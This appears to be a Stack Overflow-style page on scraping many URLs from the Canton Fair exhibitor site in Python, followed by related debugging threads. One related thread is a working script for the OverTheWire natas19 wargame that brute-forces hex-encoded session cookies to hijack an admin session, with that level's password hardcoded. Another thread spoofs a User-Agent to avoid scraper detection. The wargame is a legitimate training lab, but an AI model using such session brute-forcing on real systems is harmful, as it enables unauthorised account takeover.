How to scrape many dynamic URLs in Python
I want to scrape one dynamic URL at a time.
First I collect the URLs from all the hrefs on a category page, and then I want to scrape each of those URLs in turn.
Here is what I am trying:
from bs4 import BeautifulSoup
import urllib.request
import re
r = urllib.request.urlopen('http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware')
soup = BeautifulSoup(r, "html.parser")
links = soup.find_all("a", href=re.compile(r"expexhibitorlist\.aspx\?categoryno=[0-9]+"))
linksfromcategories = ([link["href"] for link in links])
string = "http://i.cantonfair.org.cn/en/"
str1 = [string + x for x in linksfromcategories]
fulllinksfromcategories = '\n'.join(str1)
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
soup2 = BeautifulSoup(lfc,"html.parser")
print(soup2)
But it gives me the following error:
Traceback (most recent call last):
File "D:\python\scarpepython.py", line 50, in <module>
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 162, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 465, in open
response = self._open(req, data)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 483, in _open
'_open', req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 443, in _call_chain
result = func(*args)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1268, in http_open
return self.do_open(http.client.HTTPConnection, req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1243, in do_open
r = h.getresponse()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 1174, in getresponse
response.begin()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 282, in begin
version, status, reason = self._read_status()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 264, in _read_status
raise BadStatusLine(line)
http.client.BadStatusLine:
This could be an option using lxml:
from pprint import pprint
import lxml.html
import requests
import re

url = 'http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page=1'
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)

# Read the "Pages 1/NN" text from the pager to find out how many result pages there are
regexp_total_pages = re.compile(r"Pages\s\d/(\d+)")
text_total_pages = root.xpath('//*[@id="AspNetPager1"]/div[1]/text()')[0].strip()
total_pages = int(re.match(regexp_total_pages, text_total_pages).group(1))

# Collect the exhibitor links from every result page
all_links = list()
for i in range(1, total_pages + 1):
    url = "http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page={page}".format(page=i)
    doc = requests.get(url)
    root = lxml.html.fromstring(doc.text)
    all_links.append(root.xpath('//*[@id="form1"]/div[*]/div[*]/h3/a/@href'))

pprint(all_links)
Output:
[['expCompany.aspx?corpid=0776011226',
'expCompany.aspx?corpid=0767408756',
'expCompany.aspx?corpid=0768210055',
'expCompany.aspx?corpid=0797720568',
'expCompany.aspx?corpid=0732708199',
'expCompany.aspx?corpid=0793210033',
'expCompany.aspx?corpid=0732106474',
'expCompany.aspx?corpid=0758010034',
'expCompany.aspx?corpid=0971067386',
'expCompany.aspx?corpid=0740321671'],
['expCompany.aspx?corpid=0778019678',
'expCompany.aspx?corpid=0856547211',
'expCompany.aspx?corpid=0786118468',
'expCompany.aspx?corpid=0836547578',
'expCompany.aspx?corpid=0898829143',
'expCompany.aspx?corpid=0785822466',
'expCompany.aspx?corpid=0886647641',
'expCompany.aspx?corpid=0965278225',
'expCompany.aspx?corpid=0889552449',
'expCompany.aspx?corpid=0757118156'],
['expCompany.aspx?corpid=0800629095',
'expCompany.aspx?corpid=0797100877',
'expCompany.aspx?corpid=0791001566',
'expCompany.aspx?corpid=0955274359',
'expCompany.aspx?corpid=0789803409',
'expCompany.aspx?corpid=0769413578',
'expCompany.aspx?corpid=0712314777',
'expCompany.aspx?corpid=0873048367',
'expCompany.aspx?corpid=0716520166',
'expCompany.aspx?corpid=1444012375'],
['expCompany.aspx?corpid=1020485398',
'expCompany.aspx?corpid=1218502245',
'expCompany.aspx?corpid=1197393480',
'expCompany.aspx?corpid=1366309374',
'expCompany.aspx?corpid=1204799012',
'expCompany.aspx?corpid=1078880722',
'expCompany.aspx?corpid=1367905785',
'expCompany.aspx?corpid=1427517382',
'expCompany.aspx?corpid=1377308235',
'expCompany.aspx?corpid=1437717128'],
['expCompany.aspx?corpid=1361609356',
'expCompany.aspx?corpid=1532524260',
'expCompany.aspx?corpid=1512425129',
'expCompany.aspx?corpid=1371110608',
'expCompany.aspx?corpid=1021582521',
'expCompany.aspx?corpid=0829323712',
'expCompany.aspx?corpid=0756508698',
'expCompany.aspx?corpid=0781315922',
'expCompany.aspx?corpid=0850325858',
'expCompany.aspx?corpid=0713405337'],
['expCompany.aspx?corpid=0895550135',
'expCompany.aspx?corpid=0736604457',
'expCompany.aspx?corpid=0761821937',
'expCompany.aspx?corpid=0853755897',
'expCompany.aspx?corpid=0807455302',
'expCompany.aspx?corpid=0763919269',
'expCompany.aspx?corpid=0736104221',
'expCompany.aspx?corpid=0796616555',
'expCompany.aspx?corpid=0804229227',
'expCompany.aspx?corpid=0746304700'],
['expCompany.aspx?corpid=0839047328',
'expCompany.aspx?corpid=0875628420',
'expCompany.aspx?corpid=0869651030',
'expCompany.aspx?corpid=0838653323',
'expCompany.aspx?corpid=0779107569',
'expCompany.aspx?corpid=0748806674',
'expCompany.aspx?corpid=0736602141',
'expCompany.aspx?corpid=0722715458',
'expCompany.aspx?corpid=0782910676',
'expCompany.aspx?corpid=0798114121'],
['expCompany.aspx?corpid=0830450037',
'expCompany.aspx?corpid=0723700490',
'expCompany.aspx?corpid=0889823692',
'expCompany.aspx?corpid=0984073042',
'expCompany.aspx?corpid=0726719753',
'expCompany.aspx?corpid=0742406942',
'expCompany.aspx?corpid=0742119461',
'expCompany.aspx?corpid=0728315987',
'expCompany.aspx?corpid=0818248812',
'expCompany.aspx?corpid=0750419352'],
['expCompany.aspx?corpid=0982275722',
'expCompany.aspx?corpid=0815756641',
'expCompany.aspx?corpid=0712604536',
'expCompany.aspx?corpid=0798617576',
'expCompany.aspx?corpid=0734217566',
'expCompany.aspx?corpid=0878728894',
'expCompany.aspx?corpid=0772422523',
'expCompany.aspx?corpid=0784607985',
'expCompany.aspx?corpid=0786204936',
'expCompany.aspx?corpid=0886423907'],
['expCompany.aspx?corpid=0789300431',
'expCompany.aspx?corpid=0779921604',
'expCompany.aspx?corpid=0794403082',
'expCompany.aspx?corpid=0769111680',
'expCompany.aspx?corpid=0746606839',
'expCompany.aspx?corpid=0896726003',
'expCompany.aspx?corpid=0886728390',
'expCompany.aspx?corpid=0841756743',
'expCompany.aspx?corpid=1010680461',
'expCompany.aspx?corpid=0837456503'],
['expCompany.aspx?corpid=0735317945',
'expCompany.aspx?corpid=0858556012',
'expCompany.aspx?corpid=0883227862',
'expCompany.aspx?corpid=0802151577',
'expCompany.aspx?corpid=0725403915',
'expCompany.aspx?corpid=0773118307',
'expCompany.aspx?corpid=0977967839',
'expCompany.aspx?corpid=0889257398',
'expCompany.aspx?corpid=0773003774',
'expCompany.aspx?corpid=0741211862'],
['expCompany.aspx?corpid=0944767300',
'expCompany.aspx?corpid=0766703225',
'expCompany.aspx?corpid=0807623222',
'expCompany.aspx?corpid=0754416485',
'expCompany.aspx?corpid=0716414765',
'expCompany.aspx?corpid=0764603066',
'expCompany.aspx?corpid=0757110589',
'expCompany.aspx?corpid=0800248632',
'expCompany.aspx?corpid=0747902779',
'expCompany.aspx?corpid=0738619647'],
['expCompany.aspx?corpid=1098582416',
'expCompany.aspx?corpid=0909669961',
'expCompany.aspx?corpid=0862829627',
'expCompany.aspx?corpid=0892328884',
'expCompany.aspx?corpid=0886729635',
'expCompany.aspx?corpid=0724805261',
'expCompany.aspx?corpid=0877655294',
'expCompany.aspx?corpid=0835853958',
'expCompany.aspx?corpid=0737821957',
'expCompany.aspx?corpid=0785019255'],
['expCompany.aspx?corpid=0873828585',
'expCompany.aspx?corpid=0735401884',
'expCompany.aspx?corpid=0927058069',
'expCompany.aspx?corpid=0794816876',
'expCompany.aspx?corpid=0721211392',
'expCompany.aspx?corpid=0741602341',
'expCompany.aspx?corpid=0760906105',
'expCompany.aspx?corpid=0904473659',
'expCompany.aspx?corpid=0711614568',
'expCompany.aspx?corpid=0753503530'],
['expCompany.aspx?corpid=0774108002',
'expCompany.aspx?corpid=0845328722',
'expCompany.aspx?corpid=0823848403',
'expCompany.aspx?corpid=0876029511',
'expCompany.aspx?corpid=0886827914',
'expCompany.aspx?corpid=0712712280',
'expCompany.aspx?corpid=0833854881',
'expCompany.aspx?corpid=0746216867',
'expCompany.aspx?corpid=0774704214',
'expCompany.aspx?corpid=0730516488'],
['expCompany.aspx?corpid=0716607064',
'expCompany.aspx?corpid=0758917403',
'expCompany.aspx?corpid=0763702256',
'expCompany.aspx?corpid=0721303394',
'expCompany.aspx?corpid=0828647452',
'expCompany.aspx?corpid=0771805641',
'expCompany.aspx?corpid=0741722489',
'expCompany.aspx?corpid=0980867582',
'expCompany.aspx?corpid=0790809611',
'expCompany.aspx?corpid=0714917484'],
['expCompany.aspx?corpid=0790402155',
'expCompany.aspx?corpid=0710118558',
'expCompany.aspx?corpid=0864455955',
'expCompany.aspx?corpid=0784706276',
'expCompany.aspx?corpid=0897623416',
'expCompany.aspx?corpid=0821453137',
'expCompany.aspx?corpid=0754917280',
'expCompany.aspx?corpid=0724600646',
'expCompany.aspx?corpid=0764211415',
'expCompany.aspx?corpid=0735008307'],
['expCompany.aspx?corpid=0795909343',
'expCompany.aspx?corpid=0850830043',
'expCompany.aspx?corpid=0970778277',
'expCompany.aspx?corpid=1075781404',
'expCompany.aspx?corpid=1252802513',
'expCompany.aspx?corpid=1236901616',
'expCompany.aspx?corpid=1435215908',
'expCompany.aspx?corpid=1469712283',
'expCompany.aspx?corpid=1439615100',
'expCompany.aspx?corpid=1245501009'],
['expCompany.aspx?corpid=0901974362',
'expCompany.aspx?corpid=1487117816',
'expCompany.aspx?corpid=1058881186',
'expCompany.aspx?corpid=0809557305',
'expCompany.aspx?corpid=1265998039',
'expCompany.aspx?corpid=1188093431',
'expCompany.aspx?corpid=0995572026',
'expCompany.aspx?corpid=1036184837',
'expCompany.aspx?corpid=0990573086',
'expCompany.aspx?corpid=1464212531'],
['expCompany.aspx?corpid=0858351382',
'expCompany.aspx?corpid=1348806571',
'expCompany.aspx?corpid=0822452086',
'expCompany.aspx?corpid=1428413902',
'expCompany.aspx?corpid=0879752062',
'expCompany.aspx?corpid=1369405760',
'expCompany.aspx?corpid=1256000612',
'expCompany.aspx?corpid=1037680042',
'expCompany.aspx?corpid=1062381570',
'expCompany.aspx?corpid=1461915811'],
['expCompany.aspx?corpid=1373808159',
'expCompany.aspx?corpid=1027382040',
'expCompany.aspx?corpid=1191393458',
'expCompany.aspx?corpid=1133389590',
'expCompany.aspx?corpid=0762910036',
'expCompany.aspx?corpid=1399206654',
'expCompany.aspx?corpid=1253598637',
'expCompany.aspx?corpid=1128889405',
'expCompany.aspx?corpid=1082384190',
'expCompany.aspx?corpid=1077881359'],
['expCompany.aspx?corpid=1584325065',
'expCompany.aspx?corpid=1131692156',
'expCompany.aspx?corpid=1587322969',
'expCompany.aspx?corpid=1251100353',
'expCompany.aspx?corpid=1115590386',
'expCompany.aspx?corpid=1541424572',
'expCompany.aspx?corpid=1137393378',
'expCompany.aspx?corpid=1069988131',
'expCompany.aspx?corpid=1392806069',
'expCompany.aspx?corpid=0766210029'],
['expCompany.aspx?corpid=1143394259',
'expCompany.aspx?corpid=1561819111',
'expCompany.aspx?corpid=1349307520']]
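The code above stops at collecting the relative expCompany.aspx links. A rough sketch of the next step, fetching each company page, is below; the flattening via itertools.chain, the one-second pause, and the title lookup are my own illustrative assumptions, not part of the original answer. It assumes all_links from the code above is still in scope.

import time
from itertools import chain
import lxml.html
import requests

base = "http://i.cantonfair.org.cn/en/"
for href in chain.from_iterable(all_links):       # flatten the per-page lists into one stream of hrefs
    company_url = base + href
    doc = requests.get(company_url)
    company_root = lxml.html.fromstring(doc.text)
    # e.g. print the page title as a quick sanity check that the fetch worked
    print(company_url, company_root.findtext('.//title'))
    time.sleep(1)                                  # be polite to the server between requests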
str1 in your case contains a list of URLs. You are joining that list into a single newline-separated string and then trying to open that mix as if it were one URL, which of course cannot work.
Instead, loop over the extracted URLs and open them one by one:
linksfromcategories = [string + x for x in linksfromcategories]

for link in linksfromcategories:
    print(link)
    lfc = urllib.request.urlopen(link).read()
    soup2 = BeautifulSoup(lfc, "html.parser")
    print(soup2)
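If some of those requests still fail intermittently, a more defensive variant of the same loop might look like the sketch below. The User-Agent header, the timeout, and the one-second pause are assumptions on my part, not documented requirements of the site; it reuses linksfromcategories from the snippet above.

import time
import http.client
import urllib.request
from urllib.error import URLError
from bs4 import BeautifulSoup

for link in linksfromcategories:
    try:
        req = urllib.request.Request(link, headers={"User-Agent": "Mozilla/5.0"})
        lfc = urllib.request.urlopen(req, timeout=30).read()
    except (URLError, http.client.HTTPException) as exc:
        # skip pages that error out (e.g. BadStatusLine) instead of crashing the whole run
        print("skipping", link, exc)
        continue
    soup2 = BeautifulSoup(lfc, "html.parser")
    print(soup2.title)
    time.sleep(1)  # short pause between requests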
Related
Can't put result of hexlify as cookie in requests.post
So the issue is with this code:

import requests
import string
import binascii
import codecs

url="http://natas19.natas.labs.overthewire.org/"
user="natas19"
passwd="8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie=dict(PHPSESSID="0")
test="{}-admin"

for i in range(0,641):
    with requests.Session() as sesh:
        encoded=binascii.hexlify(bytes(test.format(i),"utf-8"))
        print("Trying: " + str(i) + "-admin")
        print(encoded)
        cookie=dict(PHPSESSID=encoded)
        sesh.post(url,auth=(user,passwd),cookies=cookie)
        r=sesh.get(url,auth=(user,passwd)).content
        print(r)
        print(sesh.cookies.get_dict())
        if "You are an admin." in str(r):
            print("Success! Admin website:\n" + str(sesh.get(url,auth=(user,passwd)).content))
            break
        else:
            print("Failed.")

The hexlify returns a value like b'302d61646d696e', but the post later on considers it a string for some reason:

Trying: 0-admin
b'302d61646d696e'
Traceback (most recent call last):
  File "C:/Users/jakub/Desktop/natas19.py", line 17, in <module>
    sesh.post(url,auth=(user,passwd),cookies=cookie)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 635, in post
    return self.request("POST", url, data=data, json=json, **kwargs)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 573, in request
    prep = self.prepare_request(req)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 471, in prepare_request
    cookies = cookiejar_from_dict(cookies)
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 537, in cookiejar_from_dict
    cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
  File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 352, in set_cookie
    and cookie.value.startswith('"')
TypeError: startswith first arg must be bytes or a tuple of bytes, not str

If I decode the hexlify result instead then the code runs, but without sending the cookie. Please help and thank you in advance!
Try putting .decode('utf-8') at the end of the encoded = line:

import binascii
import requests

url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"

for i in range(0, 641):
    with requests.Session() as sesh:
        encoded = binascii.hexlify(bytes(test.format(i), "utf-8")).decode('utf-8')  # <-- put decode() here!
        print("Trying: " + str(i) + "-admin")
        print(encoded)
        cookie = dict(PHPSESSID=encoded)
        sesh.post(url, auth=(user, passwd), cookies=cookie)
        r = sesh.get(url, auth=(user, passwd)).content
        print(r)
        print(sesh.cookies.get_dict())
        if "You are an admin." in str(r):
            print(
                "Success! Admin website:\n"
                + str(sesh.get(url, auth=(user, passwd)).content)
            )
            break
        else:
            print("Failed.")
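As a quick illustration of why the decode matters (this snippet is mine, not from the original answer): binascii.hexlify returns bytes, while requests expects cookie values to be str in Python 3.

import binascii

raw = binascii.hexlify(b"0-admin")      # bytes: b'302d61646d696e'
as_text = raw.decode("utf-8")           # str:   '302d61646d696e'
print(type(raw), type(as_text))
# requests wants cookie values as str, so pass as_text, not raw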
Unexpected space (not sure what type of character this space is) while parsing a CSV file in Python
I am iterating through a list of urls from a csv file trying to locate their sitemaps, however, I am getting a weird leading space issue that's causing an error to occur when requests processes each url. I'm trying to figure out what's causing this space to be generated and what type of space it is. I believe something funky is happening with strip() because I can get this to run fine when copying and pasting a url into requests. I am just not sure what type of space this is and what's causing it to occur. Wondering if anyone else is having or had this issue?

So far I have tried to solve using the following methods:

replace()
"".join(split())
regex

Here is my code:

with open('links.csv') as f:
    for line in f:
        strdomain = line.strip()
        if strdomain:
            domain = strdomain
            fix_domain = domain.replace('https://', '').replace('www', '').replace('/', '').replace('.', '').replace(' ', '')
            ofile = fix_domain + '.txt'  # args.ofile
            domain_rem = domain
            map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
            url_info = find_sitemap.parse_sitemap(map)
            print("Found {0} urls".format(len(url_info)))
            new_urls = []
            for u in url_info:
                new_urls.append(u)
                print(u)

links.csv looks like the following with just one column:

https://site1.com/
https://site2.com/
https://site3.com/

I printed domain and strdomain and even added the word "this" next to the variable domain so you can see the space being produced clearly.

Here is the error I receive in full when running (you will notice there is no leading space within the url after I've copied and pasted from the terminal into here, however I provide an image of my terminal below so you can see it):

Traceback (most recent call last):
  File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 358, in <module>
    main()
  File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 318, in main
    map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
  File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/find_sitemap.py", line 5, in get_sitemap
    get_url = requests.get(url)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 522, in request
    resp = self.send(prep, **send_kwargs)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 636, in send
    adapter = self.get_adapter(url=request.url)
  File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 727, in get_adapter
    raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'https://blkgrn.com/sitemap.xml'

Here is where you can see the leading space that occurs.

Here is the code for "find_sitemap.py":

from bs4 import BeautifulSoup
import requests

def get_sitemap(url):
    get_url = requests.get(url)
    if get_url.status_code == 200:
        return get_url.text
    else:
        print('Unable to fetch sitemap: %s.' % url)

def process_sitemap(s):
    soup = BeautifulSoup(s, "lxml")
    result = []
    for loc in soup.findAll('loc'):
        item = {}
        item['loc'] = loc.text
        item['tag'] = loc.parent.name
        if loc.parent.lastmod is not None:
            item['lastmod'] = loc.parent.lastmod.text
        if loc.parent.changeFreq is not None:
            item['changeFreq'] = loc.parent.changeFreq.text
        if loc.parent.priority is not None:
            item['priority'] = loc.parent.priority.text
        result.append(item)
    return result

def is_sub_sitemap(s):
    if s['loc'].endswith('.xml') and s['tag'] == 'sitemap':
        return True
    else:
        return False

def parse_sitemap(s):
    sitemap = process_sitemap(s)
    result = []
    while sitemap:
        candidate = sitemap.pop()
        if is_sub_sitemap(candidate):
            sub_sitemap = get_sitemap(candidate['loc'])
            for i in process_sitemap(sub_sitemap):
                sitemap.append(i)
        else:
            result.append(candidate)
    return result
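The thread never pins down which character was sneaking in. A hedged way to see exactly what each line contains is to print its repr and the Unicode name of any space-like or invisible character; reading with the utf-8-sig codec is my assumption that a BOM might be the culprit, not something the post confirms.

import unicodedata

with open('links.csv', encoding='utf-8-sig') as f:   # utf-8-sig strips a leading BOM if present
    for line in f:
        if not line.strip():
            continue
        print(repr(line))                             # shows \ufeff, \xa0, \u200b, etc. explicitly
        for ch in line.rstrip('\n'):
            if ch.isspace() or not ch.isprintable():
                # flags every space-like or invisible character, including NO-BREAK SPACE
                print(hex(ord(ch)), unicodedata.name(ch, 'UNKNOWN'))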
Weird error with pool module and beautiful soup: Invalid URL 'h'
I am scraping a very large website with Beautiful Soup for a project and want to use the Pool module to speed it up. I am getting a weird error where it is not correctly reading the list of URLs; as far as I can tell it is just grabbing the first 'h'. The entire code works perfectly if I do not use Pool, and the list of URLs is read properly. I am not sure if there is something weird about how you have to prepare the URLs when calling p.map(scrapeClauses, links), because if I simply call scrapeClauses(links) everything works.

Here is my main function:

if __name__ == '__main__':
    links = list()
    og = 'https://www.lawinsider.com'
    halflink = '/clause/limitation-of-liability'
    link = og + halflink
    links.append(link)
    i = 0
    while i < 50:
        try:
            nextLink = generateNextLink(link)
            links.append(nextLink)
            link = nextLink
            i += 1
        except:
            print('Only ', i, 'links found')
            i = 50
    start_time = time.time()
    print(links[0])
    p = Pool(5)
    p.map(scrapeClauses, links)
    p.terminate()
    p.join()
    #scrapeClauses(links)

and here is scrapeClauses():

def scrapeClauses(links):
    # header to avoid site detecting scraper
    headers = requests.utils.default_headers()
    headers.update({
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
    })
    # list of clauses
    allText = []
    number = 0
    for line in links:
        page_link = line
        print(page_link)
        page_response = requests.get(page_link, headers=headers)
        html_soup = BeautifulSoup(page_response.content, "html.parser")
        assignments = html_soup.find_all('div', class_='snippet-content')
        for i in range(len(assignments)):
            assignments[i] = assignments[i].get_text()
            # option to remove the assignment that precedes each clause
            #assignments[i] = assignments[i].replace('Assignment.','',1)
            allText.append(assignments[i])
            # change the index of the name of the word doc
            name = 'limitationOfLiability' + str(number) + '.docx'
            # some clauses have special characters that produce an error
            try:
                document = Document()
                stuff = assignments[i]
                document.add_paragraph(stuff)
                document.save(name)
                number += 1
            except:
                continue

I did not include generateNextLink() to save space and because I am pretty sure the error is not in there, but if someone thinks it is I will provide it. As you can see, I print(page_link) in scrapeClauses. If I am not using Pool, it prints all the normal links. But if I use Pool, a bunch of 'h's print out line after line. I then get an error that 'h' is not a valid URL. I will show the error output below.
https://www.lawinsider.com/clause/limitation-of-liability
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
multiprocessing.pool.RemoteTraceback:
"""
Traceback (most recent call last):
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiprocessing\pool.py", line 121, in worker
    result = (True, func(*args, **kwds))
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiprocessing\pool.py", line 44, in mapstar
    return list(map(*args))
  File "C:\Users\wquinn\Web Scraping\assignmentBSScraper.py", line 20, in scrapeClauses
    page_response = requests.get(page_link, headers=headers)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\sessions.py", line 519, in request
    prep = self.prepare_request(req)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\sessions.py", line 462, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\models.py", line 313, in prepare
    self.prepare_url(url, params)
  File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packages\requests\models.py", line 387, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 'h': No schema supplied. Perhaps you meant http://h?
The second argument of p.map takes a list. Each element of that list is sent to the function separately, so your function receives a single string, not the list of strings you expect.

A minimal example:

from multiprocessing import Pool

def f(str_list):
    for x in str_list:
        print('hello {}'.format(x))

if __name__ == '__main__':
    str_list = ['111', '2', '33']
    p = Pool(5)
    p.map(f, str_list)
    p.terminate()
    p.join()

Output is:

hello 1
hello 1
hello 1
hello 2
hello 3
hello 3
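Applied to the scraper above, one way to keep a function like scrapeClauses unchanged (it expects a list of URLs) is to hand Pool sub-lists rather than single strings. The chunk helper and the stand-in scrape_batch function below are illustrative sketches of that idea, not code from the original post.

from multiprocessing import Pool

def scrape_batch(urls):
    # stand-in for scrapeClauses: it receives a *list* of URLs, as the original function expects
    for url in urls:
        print('would scrape', url)

def chunk(seq, size):
    # split a list into sub-lists of at most `size` items
    return [seq[i:i + size] for i in range(0, len(seq), size)]

if __name__ == '__main__':
    links = ['https://example.com/page{}'.format(i) for i in range(1, 21)]
    with Pool(5) as p:
        p.map(scrape_batch, chunk(links, 5))   # each worker gets a sub-list, not a single character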
Feedly API & JSON
I'm trying to access the Feedly API to collect and share articles automatically to a Facebook group. So far, I haven't even been able to figure out how to use the Feedly API wrapper located here: https://github.com/zgw21cn/FeedlyClient

from feedlyclient import FeedlyClient

# Feedly
feedaccess = "removed"
myfeedId = "removed"

con = FeedlyClient()
con.get_feed_content(feedaccess,myfeedId,False,10000)
parsed = json.loads(con)
print json.dumps(parsed)

Terminal:

PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
  File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 8, in <module>
    con = FeedlyClient.get_feed_content(feedaccess,myfeedId,False,10000)
TypeError: unbound method get_feed_content() must be called with FeedlyClient instance as first argument (got str instance instead)
PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
  File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 9, in <module>
    con.get_feed_content(feedaccess,myfeedId,False,10000)
  File "d:\Python Projects\Python 2\fbauto\feedlyclient.py", line 75, in get_feed_content
    return res.json()
  File "C:\Python27\lib\site-packages\requests\models.py", line 892, in json
    return complexjson.loads(self.text, **kwargs)
  File "C:\Python27\lib\json\__init__.py", line 339, in loads
    return _default_decoder.decode(s)
  File "C:\Python27\lib\json\decoder.py", line 364, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "C:\Python27\lib\json\decoder.py", line 382, in raw_decode
    raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded

Please help.

SECOND ATTEMPT

import json
import requests

# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"

def get_feed_content(unreadOnly=None, newerThan=None, count="10", continuation=None, ranked=None):
    """
    return contents of a feed
    :param access_token:
    :param streamId:
    :param unreadOnly:
    :param newerThan:
    :param count:
    :param continuation:
    :param ranked:
    :return:
    """
    headers = {'Authorization': 'OAuth ' + feedaccess}
    quest_url = ('http://cloud.feedly.com/v3/streams/contents')
    params = dict(streamId=myfeedid)
    # Optional parameters
    if unreadOnly is not None:
        params['unreadOnly'] = unreadOnly
    if newerThan is not None:
        params['newerThan'] = newerThan
    if count is not None:
        params['count'] = count
    if continuation is not None:
        params['continuation'] = continuation
    if ranked is not None:
        params['ranked'] = ranked
    res = requests.get(url=quest_url, params=params, headers=headers)
    return res.json()

con = get_feed_content()
print json.dumps(con, indent=4)

TERMINAL

{
    "items": [],
    "id": "user/REMOVED/category/tutorial"
}

It just returns my user credentials. The Feedly documentation says I can use a category as the stream ID: https://developer.feedly.com/v3/streams/

THIRD ATTEMPT

import json
import requests
from client import FeedlyClient

# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"
feedcount = "20"

myurl = "http://cloud.feedly.com/v3/streams/contents?streamId=" + myfeedid + "&count=" + feedcount
headers = {'Authorization': 'OAuth ' + feedaccess}
res = requests.get(url=myurl, headers=headers)
con = res.json()
print json.dumps(con, indent=4)

SAME TERMINAL RESPONSE
The third attempt worked. The problem was capitalization in my category name: it should be Tutorial, not tutorial. Please see the original post for the code.
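For completeness, a sketch of the working call with the corrected capitalization; the credentials and category name below are placeholders standing in for the redacted values from the post.

import json
import requests

feedaccess = "REMOVED"                               # placeholder OAuth token
myfeedid = "user/REMOVED/category/Tutorial"          # capital T: category names are case-sensitive
feedcount = "20"

myurl = "http://cloud.feedly.com/v3/streams/contents?streamId=" + myfeedid + "&count=" + feedcount
headers = {'Authorization': 'OAuth ' + feedaccess}
res = requests.get(url=myurl, headers=headers)
print(json.dumps(res.json(), indent=4))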
Why does HTMLParser miss some tags?
I used HTMLParser to count how many h2 tags there are on http://www.worldgolf.com/courses/usa/massachusetts/. Here is the code:

class City2Parser(HTMLParser):
    def handle_starttag(self, tag, attrs):
        if tag == 'h2':
            print 'h2'

req = urllib2.Request('http://www.worldgolf.com/courses/usa/massachusetts/')
html = urllib2.urlopen(req)
parser = City2Parser()
parser.feed(html.read())

It only prints once. Why? The page obviously has three h2 tags.
